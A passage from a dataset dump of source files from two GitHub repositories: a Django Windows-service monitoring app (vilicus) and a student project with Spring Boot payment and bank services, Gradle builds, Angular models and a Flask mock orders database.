26, "path": "/vilicus/local_settings.py", "repo_name": "sjkingo/vilicus", "src_encoding": "UTF-8", "text": "# Django local site-specific settings for vilicus project.\n\nDEBUG = True\n\nADMINS = (\n # ('Your Name', '[email protected]'),\n)\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': '',\n 'USER': '',\n 'PASSWORD': '',\n 'HOST': '', # leave blank\n 'PORT': '', # leave blank\n }\n}\n\n# Hosts/domain names that are valid for this site; required if DEBUG is False\n# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts\n# If DEBUG is True, localhost will automatically be added to this list.\nALLOWED_HOSTS = []\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = '6x78*0ze892of8f+=mo8ce8cg9!e#r5_v45oz2=6$j_v)=0i0d'\n" }, { "alpha_fraction": 0.6612244844436646, "alphanum_fraction": 0.6714285612106323, "avg_line_length": 24.789474487304688, "blob_id": "37d5aa9f0a485b897b9003a3606d196260825fdb", "content_id": "b30198b13bc91781b4c5370e25ad58b356a30583", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 490, "license_type": "no_license", "max_line_length": 84, "num_lines": 19, "path": "/notify_pushover/send.py", "repo_name": "sjkingo/vilicus", "src_encoding": "UTF-8", "text": "import pushover\nfrom . import TOKEN_KEY\npushover.init(TOKEN_KEY)\n\nfrom models import PushoverUserTokens\n\n# from https://pushover.net/api#priority\nPRIORITY = {\n 'LOWEST': -2,\n 'LOW': -1,\n 'NORMAL': 0,\n 'HIGH': 1,\n 'EMERGENCY': 2,\n}\n\ndef send_push_notification(title, msg, priority=PRIORITY['NORMAL']):\n for t in PushoverUserTokens.objects.all():\n client = pushover.Client(t.token)\n client.send_message(msg, title='Vilicus alert: ' + title, priority=priority)\n" }, { "alpha_fraction": 0.6155669689178467, "alphanum_fraction": 0.6246542930603027, "avg_line_length": 31.87013053894043, "blob_id": "942cf27e0aa2efd0578601974bc0d1d73d8cfaf7", "content_id": "f9a4c86e3583ce4d58bbd9da82f81ce93a6d0b94", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5062, "license_type": "no_license", "max_line_length": 103, "num_lines": 154, "path": "/manager/models.py", "repo_name": "sjkingo/vilicus", "src_encoding": "UTF-8", "text": "import datetime\nfrom django.db import models\n\nclass Agent(models.Model):\n hostname = models.CharField(max_length=100)\n check_interval_ms = models.IntegerField(verbose_name='Check interval (ms)')\n last_checkin = models.DateTimeField(blank=True, null=True)\n version = models.CharField(max_length=5, blank=True, null=True)\n guid = models.CharField(max_length=40, blank=True, null=True)\n\n class Meta:\n verbose_name = 'Agent'\n verbose_name_plural = verbose_name + 's'\n ordering = ('hostname',)\n\n def __unicode__(self):\n return self.hostname\n\n @property\n def windows_services_shown(self):\n return self.windows_services.filter(hidden=False)\n\n @property\n def perflog_last_24hrs(self):\n then = datetime.datetime.now() - datetime.timedelta(days=1)\n return self.perflogs.filter(timestamp__gte=then)\n\n @property\n def perflog_id(self):\n return 'perflog_%d' % self.id\n\n @property\n def perflog_dataset(self):\n dataset = sorted([(entry.timestamp.strftime('%H:%M:%S'), entry.cpu_usage) \n for entry in self.perflog_last_24hrs], key=lambda x: x[0])\n labels = []\n keys = [v[0] for v in dataset]\n interval = int(len(keys) / PerformanceLogEntry.MAJOR_TICK_INTERVAL)\n if interval == 0:\n # not enough data\n return None\n for i, k in enumerate(keys):\n if i % interval == 0:\n labels.append(dataset[i][0][:-3])\n else:\n labels.append('')\n\n return {\n 'xaxis': labels,\n 'dataset': [x[1] for x in dataset]\n }\n\n# From http://msdn.microsoft.com/en-us/library/windows/desktop/ee126211(v=vs.85).aspx\nSERVICE_STATUS_STATES = (\n ('START_PENDING', 'Start pending'),\n ('RUNNING', 'Running'),\n ('STOP_PENDING', 'Stop pending'),\n ('STOPPED', 'Stopped'),\n ('PAUSE_PENDING', 'Pause pending'),\n ('PAUSED', 'Paused'),\n ('CONTINUE_PENDING', 'Continue pending'),\n ('NOT_INSTALLED', 'Not installed'),\n ('UNKNOWN', 'Unknown'),\n)\nSERVICE_STATUS_DICT = dict(SERVICE_STATUS_STATES)\n\nclass WindowsService(models.Model):\n agent = models.ForeignKey('Agent', related_name='windows_services')\n description = models.CharField(max_length=100)\n service_name = models.CharField(max_length=100)\n expected_status = models.CharField(max_length=16, \n choices=SERVICE_STATUS_STATES, default='RUNNING')\n hidden = models.BooleanField(default=False)\n\n class Meta:\n verbose_name = 'Windows Service'\n verbose_name_plural = verbose_name + 's'\n ordering = ('agent', 'description', 'service_name')\n\n def __unicode__(self):\n if self.description == self.service_name:\n return self.description\n else:\n return '{self.description} ({self.service_name})'.format(self=self)\n\n @property\n def latest_log_entries(self):\n return self.log.all()[:10]\n\n @property\n def latest_log(self):\n try:\n return self.latest_log_entries[0]\n except IndexError:\n return None\n\n @property\n def changed_since_last(self):\n try:\n if self.latest_log_entries[0].actual_status != \\\n self.latest_log_entries[1].actual_status:\n return True\n except IndexError:\n return True\n return False\n\nclass WindowsServiceLog(models.Model):\n service = models.ForeignKey('WindowsService', related_name='log')\n timestamp = models.DateTimeField()\n expected_status = models.CharField(max_length=16)\n actual_status = models.CharField(max_length=16)\n action_taken = models.CharField(max_length=50)\n comments = models.TextField(blank=True, null=True)\n\n class Meta:\n verbose_name = 'Windows Service log'\n verbose_name_plural = verbose_name + 's'\n ordering = ('service', '-timestamp')\n\n def __unicode__(self):\n return '{service} at {timestamp}'.format(service=str(self.service), \n timestamp=self.timestamp)\n\n @property\n def status_pass(self):\n return self.actual_status == self.expected_status\n\n @property\n def expected_status_h(self):\n return SERVICE_STATUS_DICT[self.expected_status]\n\n @property\n def actual_status_h(self):\n return SERVICE_STATUS_DICT[self.actual_status]\n\nclass PerformanceLogEntry(models.Model):\n agent = models.ForeignKey('Agent', related_name='perflogs')\n timestamp = models.DateTimeField()\n cpu_usage = models.IntegerField()\n\n # Interval for x-axis in charts. Note there must be this many entries before the graph will appear.\n MAJOR_TICK_INTERVAL = 6\n\n class Meta:\n verbose_name = 'Performance log entry'\n verbose_name_plural = 'Performance log entries'\n ordering = ('agent', '-timestamp')\n\n def __unicode__(self):\n return '{agent} at {timestamp}'.format(agent=str(self.agent), timestamp=self.timestamp)\n\n @property\n def hourmins(self):\n return self.timestamp.strftime('H:M')\n" }, { "alpha_fraction": 0.5300185084342957, "alphanum_fraction": 0.5355725884437561, "avg_line_length": 46.26250076293945, "blob_id": "d706c21e915fbd584b2cc949663e8e84df715682", "content_id": "55d44f30f0a42e9ead6546a35f26bfb9a06f6e26", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3781, "license_type": "no_license", "max_line_length": 395, "num_lines": 80, "path": "/manager/migrations/0001_initial.py", "repo_name": "sjkingo/vilicus", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Agent',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('hostname', models.CharField(max_length=100)),\n ('check_interval_ms', models.IntegerField(verbose_name=b'Check interval (ms)')),\n ('last_checkin', models.DateTimeField(null=True, blank=True)),\n ('version', models.CharField(max_length=5, null=True, blank=True)),\n ('guid', models.CharField(max_length=40, null=True, blank=True)),\n ],\n options={\n 'ordering': ('hostname',),\n 'verbose_name': 'Agent',\n 'verbose_name_plural': 'Agents',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='PerformanceLogEntry',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('timestamp', models.DateTimeField()),\n ('cpu_usage', models.IntegerField()),\n ('agent', models.ForeignKey(related_name='perflogs', to='manager.Agent')),\n ],\n options={\n 'ordering': ('agent', '-timestamp'),\n 'verbose_name': 'Performance log entry',\n 'verbose_name_plural': 'Performance log entries',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='WindowsService',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('description', models.CharField(max_length=100)),\n ('service_name', models.CharField(max_length=100)),\n ('expected_status', models.CharField(default=b'RUNNING', max_length=16, choices=[(b'START_PENDING', b'Start pending'), (b'RUNNING', b'Running'), (b'STOP_PENDING', b'Stop pending'), (b'STOPPED', b'Stopped'), (b'PAUSE_PENDING', b'Pause pending'), (b'PAUSED', b'Paused'), (b'CONTINUE_PENDING', b'Continue pending'), (b'NOT_INSTALLED', b'Not installed'), (b'UNKNOWN', b'Unknown')])),\n ('hidden', models.BooleanField()),\n ('agent', models.ForeignKey(related_name='windows_services', to='manager.Agent')),\n ],\n options={\n 'ordering': ('agent', 'description', 'service_name'),\n 'verbose_name': 'Windows Service',\n 'verbose_name_plural': 'Windows Services',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='WindowsServiceLog',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('timestamp', models.DateTimeField()),\n ('expected_status', models.CharField(max_length=16)),\n ('actual_status', models.CharField(max_length=16)),\n ('action_taken', models.CharField(max_length=50)),\n ('comments', models.TextField(null=True, blank=True)),\n ('service', models.ForeignKey(related_name='log', to='manager.WindowsService')),\n ],\n options={\n 'ordering': ('service', '-timestamp'),\n 'verbose_name': 'Windows Service log',\n 'verbose_name_plural': 'Windows Service logs',\n },\n bases=(models.Model,),\n ),\n ]\n" }, { "alpha_fraction": 0.8399999737739563, "alphanum_fraction": 0.8399999737739563, "avg_line_length": 11.5, "blob_id": "d967c318bcd266b1b6336cfc259a0947c7791c65", "content_id": "1bc3c2fe7f8335576fabf0adf9ac211415b67af2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 25, "license_type": "no_license", "max_line_length": 13, "num_lines": 2, "path": "/lib-requirements.txt", "repo_name": "sjkingo/vilicus", "src_encoding": "UTF-8", "text": "lxml-devel\nlibxslt-devel\n" }, { "alpha_fraction": 0.7798013091087341, "alphanum_fraction": 0.7798013091087341, "avg_line_length": 30.789474487304688, "blob_id": "b4b9658e1761e04cbb2864b448bf885290b34c24", "content_id": "e6e94dedfa09b397565c3a74544e5a7609752965", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 604, "license_type": "no_license", "max_line_length": 79, "num_lines": 19, "path": "/manager/admin.py", "repo_name": "sjkingo/vilicus", "src_encoding": "UTF-8", "text": "from django.contrib import admin\n\nfrom manager.models import *\n\nclass AgentAdmin(admin.ModelAdmin):\n readonly_fields = ('last_checkin', 'version', 'guid')\n\nadmin.site.register(Agent, AgentAdmin)\n\nadmin.site.register(WindowsService)\n\nclass WindowsServiceLogAdmin(admin.ModelAdmin):\n readonly_fields = ('service', 'timestamp', 'actual_status', 'action_taken')\n\nadmin.site.register(WindowsServiceLog, WindowsServiceLogAdmin)\n\nclass PerformanceLogEntryAdmin(admin.ModelAdmin):\n readonly_fields = ('agent', 'timestamp', 'cpu_usage')\nadmin.site.register(PerformanceLogEntry, PerformanceLogEntryAdmin)\n" } ]
19
Kadek/ProjektowanieOprogramowania
https://github.com/Kadek/ProjektowanieOprogramowania
63b7d48201992a19ef68f16021c2ac983bc4de6f
9645587ab41b1ac88fae21563e813d241c63d243
c3f749c35ffa364d3fff47b4befcd47017a8a369
refs/heads/master
2020-04-03T07:32:18.074690
2018-12-08T20:48:08
2018-12-08T20:48:08
155,105,641
0
0
null
2018-10-28T19:06:10
2018-10-28T19:06:12
2018-10-28T20:17:53
Python
[ { "alpha_fraction": 0.6540880799293518, "alphanum_fraction": 0.6540880799293518, "avg_line_length": 17.875, "blob_id": "0cb6f070ab89a019d6d20f5876d1873d33453956", "content_id": "48e88a4494d399dbb31ce2fed8b697034ead6197", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 318, "license_type": "no_license", "max_line_length": 79, "num_lines": 16, "path": "/platnosci/platnosci/src/main/java/platnosci/Entity/PaymentMethods.java", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "/*\r\n * To change this license header, choose License Headers in Project Properties.\r\n * To change this template file, choose Tools | Templates\r\n * and open the template in the editor.\r\n */\r\npackage platnosci.Entity;\r\n\r\n/**\r\n *\r\n * @author adas\r\n */\r\npublic enum PaymentMethods {\r\n BLIK,\r\n CARD,\r\n PRZELEW\r\n}\r\n" }, { "alpha_fraction": 0.75, "alphanum_fraction": 0.75, "avg_line_length": 34, "blob_id": "974384b7b94214e7079a2c7436bc1cf0513474e4", "content_id": "813529c9f6feb1491e7236600c031177abce9e05", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Gradle", "length_bytes": 36, "license_type": "no_license", "max_line_length": 34, "num_lines": 1, "path": "/baza_personel/baza_personel/settings.gradle", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "rootProject.name = 'baza_personel'\r\n" }, { "alpha_fraction": 0.6407284736633301, "alphanum_fraction": 0.6622516512870789, "avg_line_length": 23.70212745666504, "blob_id": "e0f7b2790ce91ba9cbbebb8da6e1ec3c0dd2d558", "content_id": "4a30567583afb81d808601472e89c0b3ae8da9a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Gradle", "length_bytes": 1208, "license_type": "no_license", "max_line_length": 85, "num_lines": 47, "path": "/baza_personel/baza_personel/build.gradle", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "import org.gradle.api.artifacts.*\r\n\r\nbuildscript {\r\n repositories {\r\n mavenCentral()\r\n }\r\n dependencies {\r\n classpath(\"org.springframework.boot:spring-boot-gradle-plugin:2.0.3.RELEASE\")\r\n }\r\n}\r\n\r\napply plugin: 'application'\r\nmainClassName = 'baza_personel.Application'\r\n\r\napply plugin: 'java'\r\napply plugin: 'org.springframework.boot'\r\napply plugin: 'io.spring.dependency-management'\r\n\r\nbootJar {\r\n baseName = 'gs-rest-service'\r\n version = '0.1.0'\r\n}\r\n\r\nrepositories {\r\n mavenCentral()\r\n}\r\n\r\nsourceCompatibility = 1.8\r\ntargetCompatibility = 1.8\r\n\r\next {\r\n logbackVersion = '1.2.3'\r\n junitVersion = '4.12'\r\n}\r\ndependencies {\r\n compile(\"org.springframework.boot:spring-boot-starter-web\")\r\n testCompile('org.springframework.boot:spring-boot-starter-test')\r\n \r\n compile \"ch.qos.logback:logback-core:$logbackVersion\",\r\n \"ch.qos.logback:logback-classic:$logbackVersion\"\r\n testCompile \"junit:junit:$junitVersion\"\r\n \r\n compile group: 'io.springfox', name: 'springfox-swagger2', version: '2.9.2'\r\n compile group: 'io.springfox', name: 'springfox-swagger-ui', version: '2.0.2'\r\n \r\n implementation 'com.google.code.gson:gson:2.8.5'\r\n}\r\n" }, { "alpha_fraction": 0.6547619104385376, "alphanum_fraction": 0.6547619104385376, "avg_line_length": 19.5, "blob_id": "c441e7905bfbb0853e1235b8a2581330dee2aab6", "content_id": "dfcbd24c6a0036e67c2e673eba58efc813f07aa4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 84, "license_type": "no_license", "max_line_length": 25, "num_lines": 4, "path": "/ui-menadzera-sieci/src/app/models/Restaurant.ts", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "export class Restaurant {\r\n public nazwa: string;\r\n public adres: string;\r\n }" }, { "alpha_fraction": 0.6689537167549133, "alphanum_fraction": 0.6700971722602844, "avg_line_length": 33.693878173828125, "blob_id": "7395e6a08002fe9a4f230f101233ad5fbb8a6ec4", "content_id": "65f3e7c6e77ff5cd6e1e9db1903df18c75e36457", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1753, "license_type": "no_license", "max_line_length": 116, "num_lines": 49, "path": "/zarzadzanie_personelem/zarzadzanie_personelem/src/main/java/zarzadzanie_personelem/Entity/EmployeeOfferCreator.java", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "/*\r\n * To change this license header, choose License Headers in Project Properties.\r\n * To change this template file, choose Tools | Templates\r\n * and open the template in the editor.\r\n */\r\npackage zarzadzanie_personelem.Entity;\r\n\r\nimport com.google.gson.Gson;\r\nimport java.util.HashMap;\r\nimport org.slf4j.Logger;\r\nimport org.slf4j.LoggerFactory;\r\nimport org.springframework.web.client.RestTemplate;\r\nimport utils.EasyCache;\r\n\r\n/**\r\n *\r\n * @author adas\r\n */\r\npublic class EmployeeOfferCreator {\r\n \r\n private static final Logger log = LoggerFactory.getLogger(EmployeeOfferCreator.class);\r\n\r\n public String createEmployeeOffer(final String employeeOfferFormJson, final String url) {\r\n log.info(\"Transforming json to object\");\r\n EmployeeOfferForm employeeOfferForm = (new Gson()).fromJson(employeeOfferFormJson, EmployeeOfferForm.class);\r\n log.info(\"Validating received form\");\r\n employeeOfferForm.validate();\r\n if(employeeOfferForm.isValid()){\r\n log.info(\"Saving to cache\");\r\n String message = saveEmployeeOfferToCache(employeeOfferForm);\r\n log.info(\"Saved to cache\");\r\n return new Gson().toJson(message);\r\n }else{\r\n return (new Gson()).toJson(\"Nie udało się!\");\r\n }\r\n }\r\n \r\n private String saveEmployeeOfferToCache(final EmployeeOfferForm employeeOfferForm) {\r\n log.info((new Gson()).toJson(EasyCache.getAllElements()));\r\n EasyCache.addElement(employeeOfferForm);\r\n log.info((new Gson()).toJson(EasyCache.getAllElements()));\r\n return \"Udało się!\";\r\n }\r\n \r\n public String getEmployeeOffers(final String url) {\r\n return (new Gson()).toJson(EasyCache.getAllElements());\r\n }\r\n \r\n}\r\n" }, { "alpha_fraction": 0.6358839273452759, "alphanum_fraction": 0.636939287185669, "avg_line_length": 29.58333396911621, "blob_id": "44070c52b7e12c0266c9ede145a4d84bf49366ee", "content_id": "9de68e7b03d1439101a88e2cb5adeced58d9b94d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1895, "license_type": "no_license", "max_line_length": 84, "num_lines": 60, "path": "/bank_back/src/main/java/bank_back/Controller/BankController.java", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "package bank_back.Controller;\r\n\r\nimport bank_back.Entity.BankConnector;\r\nimport org.slf4j.Logger;\r\nimport org.slf4j.LoggerFactory;\r\nimport org.springframework.beans.factory.annotation.Autowired;\r\nimport org.springframework.core.env.Environment;\r\nimport org.springframework.web.bind.annotation.CrossOrigin;\r\nimport org.springframework.web.bind.annotation.GetMapping;\r\nimport org.springframework.web.bind.annotation.RestController;\r\nimport org.springframework.web.bind.annotation.PostMapping;\r\nimport org.springframework.web.bind.annotation.RequestBody;\r\nimport org.springframework.web.bind.annotation.RequestParam;\r\n\r\n@RestController\r\npublic class BankController {\r\n \r\n @Autowired\r\n private Environment env;\r\n \r\n private static final Logger log = LoggerFactory.getLogger(BankController.class);\r\n \r\n @CrossOrigin\r\n @GetMapping(\"/success\")\r\n public String success(\r\n @RequestParam String id) \r\n {\r\n try{\r\n log.info(\"Received success request from id {}\", id);\r\n return (new BankConnector()).success(id, env);\r\n }catch(Exception e){\r\n return e.toString();\r\n }\r\n }\r\n \r\n @CrossOrigin\r\n @GetMapping(\"/failure\")\r\n public String failure(\r\n @RequestParam String id) \r\n {\r\n try{\r\n log.info(\"Received failure request from id {}\", id);\r\n return (new BankConnector()).failure(id, env);\r\n }catch(Exception e){\r\n return e.toString();\r\n }\r\n }\r\n \r\n @PostMapping(\"/startPayment\")\r\n public String startPayment(\r\n @RequestBody String paymentJson) \r\n {\r\n try{\r\n log.info(\"Received start payment request for payment {}\", paymentJson);\r\n return (new BankConnector()).startPayment(paymentJson, env);\r\n }catch(Exception e){\r\n return e.toString();\r\n }\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.6236686110496521, "alphanum_fraction": 0.6852071285247803, "avg_line_length": 20.236841201782227, "blob_id": "69c04e762c743a561636cd055b928794e079b65f", "content_id": "f2059ba68aabffe0cefc9abb1d0e7f78345ee95c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 856, "license_type": "no_license", "max_line_length": 79, "num_lines": 38, "path": "/README.md", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "# ProjektowanieOprogramowania\r\n\r\nNasz projekt na studia - wrzucamy kod do swoich branchy ;)\r\n\r\n\r\nHOW TO RUN!!!!:\r\n\r\n-java i gradle:\r\n1. Wchodzimy do folderu.\r\n2. gradlew build\r\n3. gradlew run\r\n\r\n-angular:\r\n1. Wchodzimy do folderu.\r\n2. npm install\r\n3. ng serve --port=\"wolny numer portu\"\r\n\r\n\r\nPORTY:\r\n\r\n zarzadzanie_personelem = 9090\r\n baza_personel = 9091\r\n platnosci = 9092\r\n bank = 9093\r\n zarzadzanie_siecia = 9094\r\n baza_zarzadzanie_siecia = 9095\r\n\r\n platnosci_gui = 4200\r\n ui_menadzera_sieci = 4201\r\n ui_menadzera_restauracji = 4202\r\n recruitment_simulation = 4203\r\n payment_simulation = 4042\r\n\r\nPROBLEMY Z DEPLOYMENTEM:\r\n\r\n- gradle nie znajduje czegoś .jar\r\n1. Dodaj zmienną środowiskową JAVA_HOME, która wskazuje ścieżkę do Twojego jdk.\r\n2. Rozszerz zmienną PATH o treść \"%JAVA_HOME%\\bin;\" (dla Windowsa)\r\n" }, { "alpha_fraction": 0.6601467132568359, "alphanum_fraction": 0.6625916957855225, "avg_line_length": 27.214284896850586, "blob_id": "e296f7f499365581a25ff531024e31bc3555b8a0", "content_id": "347a305420a51a5979cbd7434ce67ee317c31370", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 818, "license_type": "no_license", "max_line_length": 81, "num_lines": 28, "path": "/platnosci/platnosci/src/main/java/platnosci/Entity/MockPayment.java", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "package platnosci.Entity;\r\n\r\nimport org.slf4j.Logger;\r\nimport org.slf4j.LoggerFactory;\r\nimport org.springframework.web.client.RestTemplate;\r\n\r\npublic class MockPayment extends PaymentAbstract{\r\n \r\n private static final Logger log = LoggerFactory.getLogger(MockPayment.class);\r\n \r\n public MockPayment(final String url){\r\n super(url);\r\n }\r\n\r\n @Override\r\n public String pay(final PaymentForm paymentForm) {\r\n if(paymentForm.isValid()){\r\n return getPaymentRedirect(paymentForm);\r\n }else{\r\n return \"Invalid input\";\r\n }\r\n } \r\n \r\n private String getPaymentRedirect(final PaymentForm paymentForm){\r\n RestTemplate restTemplate = new RestTemplate();\r\n return restTemplate.postForObject(url, paymentForm, String.class); \r\n }\r\n}\r\n" }, { "alpha_fraction": 0.6947368383407593, "alphanum_fraction": 0.7789473533630371, "avg_line_length": 17.399999618530273, "blob_id": "a11b337252885f7f792145f09c8aa9a441f7f5de", "content_id": "1417b95a85244b6574ae7e7ee7aca8728a1d0ac4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 95, "license_type": "no_license", "max_line_length": 55, "num_lines": 5, "path": "/platnosci/platnosci/src/main/resources/application.properties", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "server.port=9092\r\n\r\nmockPaymentAddress = http://localhost:9093/startPayment\r\n\r\nconfig = nonprod" }, { "alpha_fraction": 0.518406331539154, "alphanum_fraction": 0.5371913313865662, "avg_line_length": 29.845794677734375, "blob_id": "5317209eddba3212a1e70cc05858ac9eeb4834e2", "content_id": "8745a90facf8de869bad751a2425b6d00e9d58eb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6604, "license_type": "no_license", "max_line_length": 143, "num_lines": 214, "path": "/zaslepki_baz_danych/oddzielnie/zamowienia.py", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "from flask import Flask, request, jsonify\nimport datetime\n\napp = Flask(__name__)\n\n\[email protected]('/')\ndef main_site():\n return 404\n\n\nlista_zamowien = {\n 'lista_zamowien': [\n {\n 'id_zamowienia': 1,\n 'id_klienta': 1,\n 'id_restauracji': 1,\n 'lista_dan': [\n {'id_dania': 1, 'nazwa': 'Kawa'},\n {'id_dania': 2, 'nazwa': 'Ciastko'},\n {'id_dania': 3, 'nazwa': 'Bulka'}\n ],\n 'kwota': 26.88,\n 'status': 'oczekujace',\n 'data_zlozenia': '2018-09-10',\n 'ocena': '2/10',\n 'adres': \"Grunwaldzka 13\"\n },\n {\n 'id_zamowienia': 2,\n 'id_klienta': 2,\n 'id_restauracji': 3,\n 'lista_dan': [\n {'id_dania': 1, 'nazwa': 'Kawa'},\n {'id_dania': 2, 'nazwa': 'Ciastko'},\n {'id_dania': 3, 'nazwa': 'Bulka'}\n ],\n 'kwota': 59.88,\n 'status': 'przygotowywane',\n 'data_zlozenia': '2018-06-11',\n 'ocena': '4/10',\n 'adres': \"Wolności 15\"\n\n },\n {\n 'id_zamowienia': 3,\n 'id_klienta': 1,\n 'id_restauracji': 5,\n 'lista_dan': [\n {'id_dania': 1, 'nazwa': 'Kawa'},\n {'id_dania': 2, 'nazwa': 'Ciastko'},\n {'id_dania': 3, 'nazwa': 'Bulka'}\n ],\n 'kwota': 43.80,\n 'status': 'w_drodze',\n 'data_zlozenia': '2018-12-16',\n 'ocena': '8/10',\n 'adres': \"Alternatywy 4\"\n\n }\n ]\n}\nzamowienia_interator = 4\n\n\[email protected]('/dodaj_zamowienie_Z', methods=['POST'])\ndef dodaj_zamowienie_Z():\n try:\n rrequest = request.get_json()\n if rrequest['id_klienta'] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n id_klienta = int(rrequest['id_klienta'])\n\n if rrequest['id_restauracji'] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n id_restauracji = int(rrequest['id_restauracji'])\n\n if rrequest['lista_dan'] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n lista_dan = rrequest['lista_dan']\n\n if rrequest['kwota'] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n kwota = float(rrequest['kwota'])\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n\n global zamowienia_interator\n zamowienia_interator +=1\n lista_zamowien['lista_zamowien'].append({\n 'id_zamowienia': zamowienia_interator,\n 'lista_dan': lista_dan,\n 'id_restauracji': id_restauracji,\n 'id_klienta': id_klienta,\n 'kwota': kwota,\n 'status': 'oczekujące',\n 'data_zlozenia': str(datetime.datetime.today().strftime('%Y-%m-%d'))\n })\n print(lista_zamowien)\n resp = jsonify(success=True)\n resp.status_code = 200\n return resp\n\n\n# Edytuj_zamowienie(id_zamowienia:int, lista[id_dania:int,nazwa:string],kwota:double)\[email protected]('/edytuj_zamowienie_Z', methods=['POST'])\ndef edytuj_zamowienie_Z():\n rrequest = request.get_json()\n try:\n if rrequest[\"id_zamowienia\"] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n\n try:\n if rrequest[\"lista_dan\"]:\n for zamowienie in lista_zamowien['lista_zamowien']:\n if zamowienie['id_zamowienia'] == int(rrequest['id_zamowienia']):\n zamowienie['lista_dan'] = str(rrequest['lista_dan'])\n except KeyError:\n pass\n\n try:\n if rrequest[\"kwota\"]:\n for zamowienie in lista_zamowien['lista_zamowien']:\n if zamowienie['id_zamowienia'] == int(rrequest['id_zamowienia']):\n zamowienie['cena'] = int(rrequest['cena'])\n except KeyError:\n pass\n\n print(lista_zamowien)\n resp = jsonify(success=True)\n resp.status_code = 200\n return resp\n\n\n# Zmien_status_zamowienia(id_zamowienia:int, status:string)\[email protected]('/zmien_status_zamowienia_Z', methods=['POST'])\ndef zmien_status_zamowienia_Z():\n rrequest = request.get_json()\n try:\n if rrequest[\"id_zamowienia\"] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n id_zamowienia = int(rrequest['id_zamowienia'])\n if rrequest['status'] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n status = str(rrequest['status'])\n for zamowienie in lista_zamowien['lista_zamowien']:\n if zamowienie['id_zamowienia'] == id_zamowienia:\n zamowienie['status'] = str(status)\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n print(lista_zamowien)\n resp = jsonify(success=True)\n resp.status_code = 200\n return resp\n\n\n# Pobierz zamówienia -> przekopiuj z realizacji\[email protected]('/pobierz_zamowienia_Z', methods=['GET'])\ndef pobierz_zamowienia_Z():\n try:\n if request.args.get(\"id_restauracji\") is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n id_restauracji = int(request.args.get(\"id_restauracji\"))\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n return jsonify(lista_zamowien)\n\n\n# Czy to ma sens? : Pobierz_zamowienie(id_zamowienia:int) zwraca (id_klienta:int, id_restauracji:int, lista[id_dania:int,nazwa:string],\n# kwota:double,data_zlozenia:string,status:string,ocena:int)\n\[email protected]('/pobierz_zamowienie_Z', methods=['GET'])\ndef pobierz_zamowienie_Z():\n try:\n if request.args.get(\"id_zamowienia\") is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n id_zamowienia = int(request.args.get(\"id_zamowienia\"))\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n return jsonify(lista_zamowien['lista_zamowien'][id_zamowienia])\n\n\nif __name__ == '__main__':\n app.run()\n" }, { "alpha_fraction": 